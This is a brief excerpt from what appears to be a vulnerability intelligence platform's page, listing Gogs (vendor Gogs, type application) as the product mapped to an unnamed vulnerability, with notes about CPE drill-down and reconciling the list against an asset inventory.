Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

Vendor   Product   Type
Gogs     Gogs      application

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
